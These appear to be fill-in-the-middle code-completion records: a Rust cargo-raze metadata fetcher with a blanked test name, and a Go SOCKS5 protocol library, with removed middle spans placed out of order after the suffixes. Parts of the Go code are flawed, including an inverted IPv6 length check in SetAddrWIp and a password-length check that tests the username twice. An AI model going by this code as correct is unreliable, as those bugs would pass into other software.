pub edition: String,
}
/**
* The metadata for a fully resolved dependency tree.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`MetadataResolve`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L91-L95)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct Resolve {
pub nodes: Vec<ResolveNode>,
pub root: PackageId,
}
/**
* The metadata for a single resolved entry in the full dependency tree.
*
* WARNING: Cargo-raze does not control the definition of this struct.
* This struct mirrors Cargo's own [`Node`](
* https://github.com/rust-lang/cargo/blob/0.40.0/src/cargo/ops/cargo_output_metadata.rs#L102-L106)
*/
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub struct ResolveNode {
pub id: PackageId,
pub dependencies: Vec<PackageId>,
// Optional due to recent feature addition in Cargo.
pub features: Option<Vec<String>>,
}
/** A workspace metadata fetcher that uses the Cargo Metadata subcommand. */
#[allow(dead_code)]
pub struct CargoSubcommandMetadataFetcher;
/**
* A workspace metadata fetcher that uses Cargo's internals.
*
* !DANGER DANGER!
* This struct is very hard to test as it uses Cargo's stateful internals, please take care when
* changing it.
* !DANGER DANGER!
*/
pub struct CargoInternalsMetadataFetcher<'config> {
cargo_config: &'config Config,
}
impl MetadataFetcher for CargoSubcommandMetadataFetcher {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata> {
assert!(files.toml_path.is_file());
assert!(files.lock_path_opt.as_ref().map_or(true, |p| p.is_file()));
// Copy files into a temp directory
// UNWRAP: Guarded by function assertion
let cargo_tempdir = {
let dir = TempDir::new("cargo_raze_metadata_dir")?;
let dir_path = dir.path();
let new_toml_path = dir_path.join(files.toml_path.file_name().unwrap());
fs::copy(files.toml_path, new_toml_path)?;
if let Some(lock_path) = files.lock_path_opt {
let new_lock_path = dir_path.join(lock_path.file_name().unwrap());
fs::copy(lock_path, new_lock_path)?;
}
dir
};
// Shell out to cargo
let exec_output = Command::new("cargo")
.current_dir(cargo_tempdir.path())
.args(&["metadata", "--format-version", "1"])
.output()?;
// Handle command errs
let stdout_str =
String::from_utf8(exec_output.stdout).unwrap_or_else(|_| "[unparsable bytes]".to_owned());
if !exec_output.status.success() {
let stderr_str =
String::from_utf8(exec_output.stderr).unwrap_or_else(|_| "[unparsable bytes]".to_owned());
println!("`cargo metadata` failed. Inspect Cargo.toml for issues!");
println!("stdout: {}", stdout_str);
println!("stderr: {}", stderr_str);
return Err(RazeError::Generic("Failed to run `cargo metadata`".to_owned()).into());
}
// Parse and yield metadata
serde_json::from_str::<Metadata>(&stdout_str).map_err(|e| e.into())
}
}
impl<'config> MetadataFetcher for CargoInternalsMetadataFetcher<'config> {
fn fetch_metadata(&mut self, files: CargoWorkspaceFiles) -> CargoResult<Metadata> {
let manifest = if files.toml_path.is_relative() {
env::current_dir().unwrap().join(&files.toml_path)
} else {
files.toml_path
};
let ws = Workspace::new(&manifest, &self.cargo_config)?;
let specs = Packages::All.to_package_id_specs(&ws)?;
let root_name = specs.iter().next().unwrap().name();
let resolve_opts = ResolveOpts::new(true, &[], false, false);
let (resolved_packages, cargo_resolve) = ops::resolve_ws_with_opts(&ws, resolve_opts, &specs)?;
let root = cargo_resolve
.iter()
.find(|dep| dep.name() == root_name)
.ok_or_else(|| RazeError::Internal("root crate should be in cargo resolve".to_owned()))?
.to_string();
let nodes = cargo_resolve
.iter()
.map(|id| ResolveNode {
id: id.to_string(),
features: Some(
cargo_resolve
.features_sorted(id)
.iter()
.map(|s| s.to_string())
.collect(),
),
dependencies: cargo_resolve.deps(id).map(|(p, _)| p.to_string()).collect(),
})
.collect();
let resolve = Resolve { nodes, root };
let packages = resolved_packages
.package_ids()
// TODO(acmcarther): Justify this unwrap
.map(|package_id| (package_id, resolved_packages.get_one(package_id).unwrap()))
.map(|(package_id, package)| {
let manifest_metadata = package.manifest().metadata();
let dependencies = package
.dependencies()
.iter()
.map(|dependency| Dependency {
name: dependency.package_name().to_string(),
// UNWRAP: It's cargo's responsibility to ensure a serializable source_id
source: serde_json::to_string(&dependency.source_id()).unwrap(),
req: dependency.version_req().to_string(),
kind: match dependency.kind() {
CargoKind::Normal => None,
CargoKind::Development => Some("dev".to_owned()),
CargoKind::Build => Some("build".to_owned()),
},
optional: dependency.is_optional(),
uses_default_features: dependency.uses_default_features(),
features: dependency
.features()
.iter()
.map(|s| s.to_string())
.collect(),
target: dependency.platform().map(|p| p.to_string()),
})
.collect();
let targets = package
.targets()
.iter()
.map(|target| Target {
name: target.name().to_owned(),
kind: util::kind_to_kinds(target.kind()),
src_path: target.src_path().path().unwrap().display().to_string(),
edition: target.edition().to_string(),
crate_types: target
.rustc_crate_types()
.iter()
.map(|t| t.to_string())
.collect(),
})
.collect();
let features = package
.summary()
.features()
.iter()
.map(|(feature, feature_values)| {
let our_feature_values = feature_values
.iter()
.map(|value| match value {
CargoFeatureValue::Feature(name) | CargoFeatureValue::Crate(name) => {
name.to_string()
}
// This matches the current Serialize impl for CargoFeatureValue
CargoFeatureValue::CrateFeature(crate_name, feature_name) => {
format!("{}/{}", crate_name.as_str(), feature_name.as_str())
}
})
.collect();
(feature.to_string(), our_feature_values)
})
.collect();
// UNWRAP: It's cargo's responsibility to ensure a serializable source_id
let pkg_source = serde_json::to_string(&package_id.source_id()).unwrap();
// Cargo use SHA256 for checksum so we can use them directly
let sha256 = package
.manifest()
.summary()
.checksum()
.map(ToString::to_string);
Package {
name: package.name().to_string(),
version: package.version().to_string(),
id: package_id.to_string(),
license: manifest_metadata.license.clone(),
license_file: manifest_metadata.license_file.clone(),
description: manifest_metadata.description.clone(),
source: Some(pkg_source),
manifest_path: package.manifest_path().display().to_string(),
edition: package.manifest().edition().to_string(),
dependencies,
targets,
features,
sha256,
}
})
.collect();
let workspace_members = ws
.members()
.map(|pkg| pkg.package_id().to_string())
.collect();
Ok(Metadata {
target_directory: ws.target_dir().display().to_string(),
version: 0, /* not generated via subcomand */
packages,
resolve,
workspace_members,
})
}
}
impl<'config> CargoInternalsMetadataFetcher<'config> {
pub fn new(cargo_config: &'config Config) -> CargoInternalsMetadataFetcher<'config> {
CargoInternalsMetadataFetcher { cargo_config }
}
}
fn default_dependency_field_optional() -> bool {
// Dependencies are implicitly required.
// TODO(acmcarther): Citation?
false
}
fn default_dependency_field_uses_default_features() -> bool {
// Default features are used by default
// Citation: https://doc.rust-lang.org/cargo/reference/manifest.html#rules
true
}
#[cfg(test)]
pub mod testing {
use super::*;
pub struct StubMetadataFetcher {
metadata: Metadata,
}
impl MetadataFetcher for StubMetadataFetcher {
fn fetch_metadata(&mut self, _: CargoWorkspaceFiles) -> CargoResult<Metadata> {
Ok(self.metadata.clone())
}
}
impl StubMetadataFetcher {
pub fn with_metadata(metadata: Metadata) -> StubMetadataFetcher {
StubMetadataFetcher { metadata }
}
}
pub fn dummy_package() -> Package {
Package {
name: String::new(),
version: String::new(),
id: String::new(),
license: None,
license_file: None,
description: None,
source: None,
dependencies: Vec::new(),
targets: Vec::new(),
features: HashMap::new(),
manifest_path: String::new(),
edition: String::new(),
sha256: None,
}
}
pub fn dummy_metadata() -> Metadata {
Metadata {
packages: Vec::new(),
resolve: dummy_resolve(),
workspace_members: Vec::new(),
target_directory: String::new(),
version: 1,
}
}
pub fn dummy_resolve() -> Resolve {
Resolve {
nodes: Vec::new(),
root: String::new(),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use serde_json;
use std::fs::File;
use std::io::Write;
fn basic_toml() -> &'static str {
"
[package]
name = \"test\"
version = \"0.0.1\"
[lib]
path = \"not_a_file.rs\"
"
}
fn basic_lock() -> &'static str {
"
[[package]]
name = \"test\"
version = \"0.0.1\"
dependencies = [
]
"
}
#[test]
fn test_metadata_deserializes_correctly() {
let metadata_file_contents = include_str!("../test_fixtures/metadata.txt");
serde_json::from_str::<Metadata>(metadata_file_contents).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_works_without_lock() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = dir.path().join("Cargo.toml");
let mut toml = File::create(&toml_path).unwrap();
toml.write_all(basic_toml().as_bytes()).unwrap();
let files = CargoWorkspaceFiles {
lock_path_opt: None,
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
fetcher.fetch_metadata(files).unwrap();
}
#[test]
fn | () {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = {
let path = dir.path().join("Cargo.toml");
let mut toml = File::create(&path).unwrap();
toml.write_all(basic_toml().as_bytes()).unwrap();
path
};
let lock_path = {
let path = dir.path().join("Cargo.lock");
let mut lock = File::create(&path).unwrap();
lock.write_all(basic_lock().as_bytes()).unwrap();
path
};
let files = CargoWorkspaceFiles {
lock_path_opt: Some(lock_path),
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
fetcher.fetch_metadata(files).unwrap();
}
#[test]
fn test_cargo_subcommand_metadata_fetcher_handles_bad_files() {
let dir = TempDir::new("test_cargo_raze_metadata_dir").unwrap();
let toml_path = {
let path = dir.path().join("Cargo.toml");
let mut toml = File::create(&path).unwrap();
toml.write_all(b"hello").unwrap();
path
};
let files = CargoWorkspaceFiles {
lock_path_opt: None,
toml_path,
};
let mut fetcher = CargoSubcommandMetadataFetcher;
assert!(fetcher.fetch_metadata(files).is_err());
}
}
| test_cargo_subcommand_metadata_fetcher_works_with_lock | identifier_name |
socks5.go | package socks5
import (
"encoding/binary"
"fmt"
"io"
"net"
"strconv"
"github.com/gamexg/proxylib/mempool"
)
// socks5 版本号
const Socks5Version byte = 0x05
// socks5 鉴定方式
// 无需鉴定 和 用户名密码鉴定
type Socks5AuthMethodType byte
const (
Socks5AuthMethodTypeNone Socks5AuthMethodType = 0x00
Socks5AuthMethodTypePassword Socks5AuthMethodType = 0x02
// 当服务端不支持客户端的鉴定方式时,返回这个类型
// 客户端需要立刻关闭连接
Socks5AuthMethodTypeErr Socks5AuthMethodType = 0xFF
)
// socks5 请求类型 ,socks5 cmd 状态回复
// socks5 请求类型有:tcp 传出连接、 tcp 传入连接 或 udp 连接
// socks5 回复状态有: 成功、一般性失败、规则不允许转发、主机不可达、atyp不支持、cmd命令不支持 等
type Socks5CmdType byte
const (
Socks5CmdTypeConnect Socks5CmdType = 0x01
Socks5CmdTypeBind Socks5CmdType = 0x02
Socks5CmdTypeUdpAssociate Socks5CmdType = 0x3
// cmd 回复,成功
Socks5CmdReplySucceeded Socks5CmdType = 0x00
// cmd 回复,普通SOCKS服务器连接失败
Socks5CmdReplyGeneralSocksServerFailure Socks5CmdType = 0x01
// cmd 回复,规则不允许
Socks5CmdReplyConnectionNotAllowedByRuleset Socks5CmdType = 0x02
// cmd 回复,网络不可达
Socks5CmdReplyNetworkUnreachable Socks5CmdType = 0x03
// cmd 回复,主机不可达
Socks5CmdReplyHostUnreachable Socks5CmdType = 0x04
// cmd 回复,连接被拒绝
Socks5CmdReplyConnectionRefused Socks5CmdType = 0x05
// cmd 回复,ttl超时
Socks5CmdReplyTtlExpired Socks5CmdType = 0x06
// cmd 回复,不支持的命令
Socks5CmdReplyCommandNotSupported Socks5CmdType = 0x07
// cmd 回复,不支持的地址类型
Socks5CmdReplyAddressTypeNotSupported Socks5CmdType = 0x08
// 用户自定义范围 0x09- 0xFF
// 自定义,内部错误
Socks5CmdReplyInternalError Socks5CmdType = 0x010
)
// socks 5 cmd 命令 Atyp 类型
type Socks5AtypType byte
const (
//内部使用,根据 cmd.host、cmd.Ip 内容自动确定 atyp 值
Socks5CmdAtypTypeAuto Socks5AtypType = 0x00
Socks5CmdAtypTypeIP4 Socks5AtypType = 0x01
Socks5CmdAtypTypeDomain Socks5AtypType = 0x03
Socks5CmdAtypTypeIP6 Socks5AtypType = 0x04
)
type Socks5AuthPasswordRStatusType byte
const (
// 用户名、密码正确
Socks5AuthPasswordRStatusTypeSucceeded Socks5AuthPasswordRStatusType = 0x00
// 用户名、密码错误
Socks5AuthPasswordRStatusTypeErr Socks5AuthPasswordRStatusType = 0x01
)
// 鉴定请求
type Socks5AuthPack struct {
Ver byte // 版本5
Methods []Socks5AuthMethodType
}
// 鉴定回应
type Socks5AuthRPack struct {
Ver byte // 版本 5
Method Socks5AuthMethodType
}
// 命令及回应
type Socks5CmdPack struct {
Ver byte // 版本 5
Cmd Socks5CmdType
Rsv byte
Atyp Socks5AtypType
Host []byte
Port uint16
}
// 用户名、密码
type Socks5AuthPasswordPack struct {
Ver byte //目前版本为 1
Username string
Password string
}
type Socks5AuthPasswordRPack struct {
Ver byte //目前版本为 1
Status Socks5AuthPasswordRStatusType // 0 成功 1失败
}
func (auth *Socks5AuthPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
b := buf[:2]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth head, %v", err)
}
auth.Ver = b[0]
nmethods := b[1]
if auth.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", auth.Ver)
}
b = buf[:uint8(nmethods)]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth methods, %v", err)
}
methods := make([]Socks5AuthMethodType, len(b))
for i := range methods {
methods[i] = Socks5AuthMethodType(b[i])
}
auth.Methods = methods
return nil
}
func (auth *Socks5AuthPack) HasMethod(m Socks5AuthMethodType) bool {
for _, v := range auth.Methods {
if v == m {
return true
}
}
return false
}
// 读取鉴定
// 注意,所有这种类型的操作都是阻塞的,需要自己设置超时机制
// 内部会检查协议版本等参数。
func ReadAuth(r io.Reader) (*Socks5AuthPack, error) {
auth := Socks5AuthPack{}
err := auth.Read(r)
if err != nil {
return nil, err
}
return &auth, nil
}
func (auth *Socks5AuthPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = 5
buf[1] = uint8(len(auth.Methods))
for _, v := range auth.Methods {
buf = append(buf, byte(v))
}
| return nil
}
func WriteAuth(w io.Writer, auth *Socks5AuthPack) error {
if auth == nil {
return fmt.Errorf("auth is nil")
}
return auth.Write(w)
}
func ReadSocks5AuthR(r io.Reader) (*Socks5AuthRPack, error) {
ar := Socks5AuthRPack{}
err := ar.Read(r)
if err != nil {
return nil, err
}
return &ar, err
}
func (ar *Socks5AuthRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
ar.Ver = buf[0]
ar.Method = Socks5AuthMethodType(buf[1])
if ar.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", buf[0])
}
return nil
}
func WriteSocks5AuthR(w io.Writer, cmd *Socks5AuthRPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5AuthRPack) Write(w io.Writer) error {
if _, err := w.Write([]byte{cmd.Ver, byte(cmd.Method)}); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func WriteSocks5Cmd(w io.Writer, cmd *Socks5CmdPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5CmdPack) Write(w io.Writer) error {
hostSize := len(cmd.Host)
if cmd.Atyp == Socks5CmdAtypTypeDomain && hostSize > 255 {
return fmt.Errorf("domain %v is too long", cmd.Host)
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
port := [2]byte{0}
binary.BigEndian.PutUint16(port[:], cmd.Port)
buf[0] = cmd.Ver
buf[1] = byte(cmd.Cmd)
buf[2] = cmd.Rsv
buf[3] = byte(cmd.Atyp)
buf = buf[:4]
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
buf = append(buf, cmd.Host...)
case Socks5CmdAtypTypeDomain:
buf = append(buf, uint8(len(cmd.Host)))
buf = append(buf, []byte(cmd.Host)...)
default:
return fmt.Errorf("unknown atyp %v type", cmd.Atyp)
}
buf = append(buf, port[0], port[1])
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func ReadSocks5Cmd(r io.Reader) (*Socks5CmdPack, error) {
cmd := Socks5CmdPack{}
err := cmd.Read(r)
if err != nil {
return nil, err
}
return &cmd, nil
}
// 请确定 cmd.Host 指向的内容未被其他位置使用,本函数会复用 cmd.Host 空间
func (cmd *Socks5CmdPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:4]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 command head, %v", err)
}
cmd.Ver = buf[0]
cmd.Cmd = Socks5CmdType(buf[1])
cmd.Rsv = buf[2]
cmd.Atyp = Socks5AtypType(buf[3])
if cmd.Ver != 5 {
return fmt.Errorf("unexpected protocol version %v ", cmd.Ver)
}
/* 这个不应该由这里判断。
if cmd.Cmd != 0x01 && cmd.Cmd != 0x02 && cmd.Cmd != 0x03 {
return nil, fmt.Errorf("未知的命令,cmd:%v。", cmd.Cmd)
}*/
/*if cmd.atyp == Socks5CmdAtypTypeIP4 {
buf = buf[:net.IPv4len]
}else */
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4:
buf = buf[:net.IPv4len]
case Socks5CmdAtypTypeIP6:
buf = buf[:net.IPv6len]
case Socks5CmdAtypTypeDomain:
buf = buf[:1]
default:
return fmt.Errorf("unexpected address type %v", cmd.Atyp)
}
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
cmd.Host = append(cmd.Host[:0], buf...)
case Socks5CmdAtypTypeDomain:
buf = buf[:buf[0]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
cmd.Host = append(cmd.Host, buf...)
}
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Port, %v", err)
}
cmd.Port = binary.BigEndian.Uint16(buf)
return nil
}
func (s *Socks5CmdPack) GetHostString() (string, error) {
switch s.Atyp {
case Socks5CmdAtypTypeIP4:
ip := net.IP(s.Host)
ip = ip.To4()
if len(ip) != net.IPv4len {
return "", fmt.Errorf("%v is not ipv4 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeIP6:
ip := net.IP(s.Host)
ip = ip.To16()
if len(ip) != net.IPv6len {
return "", fmt.Errorf("%v is not ipv6 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeDomain:
return string(s.Host), nil
default:
return "", fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) GetAddrString() (string, error) {
host, err := s.GetHostString()
if err != nil {
return "", err
}
return net.JoinHostPort(host, strconv.Itoa(int(s.Port))), nil
}
func (s *Socks5CmdPack) SetAddrAuto(addr string) error {
host, portStr, err := net.SplitHostPort(addr)
if err != nil {
return err
}
port, err := strconv.Atoi(portStr)
if err != nil {
return err
}
if port < 0 || port > 0xFFFF {
return fmt.Errorf("port %v < 0 || port %v > 0xFFFF", port, port)
}
s.SetHostAuto(host)
s.Port = uint16(port)
return nil
}
func (s *Socks5CmdPack) GetHostIp() (net.IP, error) {
var ip net.IP
switch s.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
ip = net.IP(s.Host)
return ip, nil
case Socks5CmdAtypTypeDomain:
ip = net.ParseIP(string(s.Host))
if len(ip) == 0 {
return nil, fmt.Errorf("%v is not ip address", s.Host)
}
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
return ipv4, nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
return ipv6, nil
}
return nil, fmt.Errorf("%v is not ipv4 or ipv6 address", s.Host)
default:
return nil, fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) SetHostAuto(v string) {
ip := net.ParseIP(v)
if len(ip) != 0 {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return
}
}
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(v)
return
}
func (s *Socks5CmdPack) SetHostDomain(domain string) {
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(domain)
}
func (s *Socks5CmdPack) SetHostIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return nil
}
return fmt.Errorf("%v is not ipv4 or ipv6 address", ip)
}
func ReadSocks5AuthPassword(r io.Reader) (*Socks5AuthPasswordPack, error) {
p := Socks5AuthPasswordPack{}
err := p.Read(r)
if err != nil {
return nil, err
}
return &p, nil
}
func (p *Socks5AuthPasswordPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth head, %v", err)
}
p.Ver = buf[0]
l := buf[1]
if p.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", p.Ver)
}
buf = buf[:l+1]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Username, %v", err)
}
p.Username = string(buf[:len(buf)-1])
buf = buf[:buf[len(buf)-1]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Password, %v", err)
}
p.Password = string(buf)
return nil
}
func WriteSocks5AuthPassword(w io.Writer, pass *Socks5AuthPasswordPack) error {
if pass == nil {
return fmt.Errorf("pass is nil")
}
return pass.Write(w)
}
func (pass *Socks5AuthPasswordPack) Write(w io.Writer) error {
if len(pass.Username) > 0xFF || len(pass.Username) > 0xFF {
return fmt.Errorf("username or password is too long")
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = pass.Ver
buf[1] = uint8(len(pass.Username))
buf = append(buf, []byte(pass.Username)...)
buf = append(buf, uint8(len(pass.Password)))
buf = append(buf, pass.Password...)
if _, err := w.Write(buf); err != nil {
return err
}
return nil
}
func ReadSocks5AuthPasswordR(r io.Reader) (*Socks5AuthPasswordRPack, error) {
pr := Socks5AuthPasswordRPack{}
err := pr.Read(r)
if err != nil {
return nil, err
}
return &pr, nil
}
func (pr *Socks5AuthPasswordRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
pr.Ver = buf[0]
pr.Status = Socks5AuthPasswordRStatusType(buf[1])
if pr.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", pr.Ver)
}
return nil
}
func WriteSocks5AuthPasswordR(w io.Writer, r *Socks5AuthPasswordRPack) error {
if r == nil {
return fmt.Errorf("r is nil")
}
return r.Write(w)
}
func (r *Socks5AuthPasswordRPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = r.Ver
buf[1] = byte(r.Status)
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
type Socks5UdpPack struct {
Rsv uint16
FRAG byte
ATYP Socks5AtypType
Host string
Ip net.IP
Port uint16
Data []byte
}
func (p *Socks5UdpPack) Parse(data []byte) error {
if len(data) < 11 {
return fmt.Errorf("data length is too short")
}
rsv := binary.BigEndian.Uint16(data)
frag := data[2]
atyp := Socks5AtypType(data[3])
ip := p.Ip[:0]
host := ""
portData := data
switch Socks5AtypType(atyp) {
case Socks5CmdAtypTypeIP4:
ip = append(ip, data[4:4+net.IPv4len]...)
portData = data[4+net.IPv4len:]
case Socks5CmdAtypTypeIP6:
if len(data) < 23 {
return fmt.Errorf("data length is too short")
}
ip = append(ip, data[4:4+net.IPv6len]...)
portData = data[4+net.IPv6len:]
case Socks5CmdAtypTypeDomain:
l := int(data[4])
if len(data) < 7+l {
return fmt.Errorf("data length is too short")
}
host = string(data[5 : 5+l])
portData = data[5+l:]
default:
return fmt.Errorf("unexpected atyp %v", atyp)
}
*p = Socks5UdpPack{}
port := binary.BigEndian.Uint16(portData[:2])
udpData := portData[2:]
p.Rsv = rsv
p.FRAG = frag
p.ATYP = atyp
p.Host = host
p.Ip = append(p.Ip[:0], ip...)
p.Port = port
p.Data = append(p.Data[:0], udpData...)
return nil
}
func (p *Socks5UdpPack) To(data []byte) (int, error) {
atyp := Socks5AtypType(p.ATYP)
ip := p.Ip
host := []byte(p.Host)
hostSize := 0
port := p.Port
if atyp == Socks5CmdAtypTypeAuto {
if len(ip) == 0 {
ip = net.ParseIP(p.Host)
}
if len(ip) == 0 {
atyp = Socks5CmdAtypTypeDomain
} else {
if ipv4 := ip.To4(); len(ipv4) == net.IPv4len {
ip = ipv4
}
switch len(ip) {
case net.IPv4len:
atyp = Socks5CmdAtypTypeIP4
ip = ip
case net.IPv6len:
atyp = Socks5CmdAtypTypeIP6
default:
return 0, fmt.Errorf("ip %v length is incorrect", ip)
}
}
}
switch atyp {
case Socks5CmdAtypTypeIP4:
ip = ip.To4()
if len(ip) != net.IPv4len {
return 0, fmt.Errorf("ipv4 %v length is incorrect", ip)
}
hostSize = net.IPv4len
case Socks5CmdAtypTypeIP6:
if len(ip) != net.IPv6len {
return 0, fmt.Errorf("ipv6 %v length is incorrect", ip)
}
hostSize = net.IPv6len
case Socks5CmdAtypTypeDomain:
if len(host) > 0xFF {
return 0, fmt.Errorf("host %v is too long", host)
}
hostSize = len(host) + 1
default:
return 0, fmt.Errorf("unexpected atyp %v", atyp)
}
mustSize := 6 + hostSize + len(p.Data)
if len(data) < mustSize {
return mustSize, fmt.Errorf("not enough space")
}
binary.BigEndian.PutUint16(data, p.Rsv)
data[2] = p.FRAG
data[3] = byte(atyp)
switch atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
copy(data[4:4+hostSize], ip)
case Socks5CmdAtypTypeDomain:
data[4] = byte(len(host))
copy(data[4+1:4+hostSize], host)
}
binary.BigEndian.PutUint16(data[4+hostSize:], port)
copy(data[4+hostSize+2:], p.Data)
return mustSize, nil
}
func (p *Socks5UdpPack) SetAddr(addr net.Addr) error {
udpAddr, _ := addr.(*net.UDPAddr)
if udpAddr == nil {
return fmt.Errorf("非预期的 udpAddr 格式, %v", addr)
}
err := p.SetAddrWIp(udpAddr.IP)
if err != nil {
return fmt.Errorf("SetAddrWIp,%v", err)
}
p.SetAddrWPort(udpAddr.Port)
return nil
}
func (p *Socks5UdpPack) SetAddrWIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
p.Ip = ipv4
p.ATYP = Socks5CmdAtypTypeIP4
return nil
}
ipv6 := ip.To16()
if len(ipv6) != net.IPv6len {
p.Ip = ipv6
p.ATYP = Socks5CmdAtypTypeIP6
return nil
}
return fmt.Errorf("非预期的 ip 版本,%v", ip)
}
func (p *Socks5UdpPack) SetAddrWPort(port int) {
p.Port = uint16(port)
}
func (p *Socks5UdpPack) GetUdpAddr() (*net.UDPAddr, error) {
switch p.ATYP {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
return &net.UDPAddr{
IP: p.Ip,
Port: int(p.Port),
Zone: "",
}, nil
default:
return nil, fmt.Errorf("非预期的地址类型")
}
} | if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write,%v", err)
}
| random_line_split |
socks5.go | package socks5
import (
"encoding/binary"
"fmt"
"io"
"net"
"strconv"
"github.com/gamexg/proxylib/mempool"
)
// socks5 版本号
const Socks5Version byte = 0x05
// socks5 鉴定方式
// 无需鉴定 和 用户名密码鉴定
type Socks5AuthMethodType byte
const (
Socks5AuthMethodTypeNone Socks5AuthMethodType = 0x00
Socks5AuthMethodTypePassword Socks5AuthMethodType = 0x02
// 当服务端不支持客户端的鉴定方式时,返回这个类型
// 客户端需要立刻关闭连接
Socks5AuthMethodTypeErr Socks5AuthMethodType = 0xFF
)
// socks5 请求类型 ,socks5 cmd 状态回复
// socks5 请求类型有:tcp 传出连接、 tcp 传入连接 或 udp 连接
// socks5 回复状态有: 成功、一般性失败、规则不允许转发、主机不可达、atyp不支持、cmd命令不支持 等
type Socks5CmdType byte
const (
Socks5CmdTypeConnect Socks5CmdType = 0x01
Socks5CmdTypeBind Socks5CmdType = 0x02
Socks5CmdTypeUdpAssociate Socks5CmdType = 0x3
// cmd 回复,成功
Socks5CmdReplySucceeded Socks5CmdType = 0x00
// cmd 回复,普通SOCKS服务器连接失败
Socks5CmdReplyGeneralSocksServerFailure Socks5CmdType = 0x01
// cmd 回复,规则不允许
Socks5CmdReplyConnectionNotAllowedByRuleset Socks5CmdType = 0x02
// cmd 回复,网络不可达
Socks5CmdReplyNetworkUnreachable Socks5CmdType = 0x03
// cmd 回复,主机不可达
Socks5CmdReplyHostUnreachable Socks5CmdType = 0x04
// cmd 回复,连接被拒绝
Socks5CmdReplyConnectionRefused Socks5CmdType = 0x05
// cmd 回复,ttl超时
Socks5CmdReplyTtlExpired Socks5CmdType = 0x06
// cmd 回复,不支持的命令
Socks5CmdReplyCommandNotSupported Socks5CmdType = 0x07
// cmd 回复,不支持的地址类型
Socks5CmdReplyAddressTypeNotSupported Socks5CmdType = 0x08
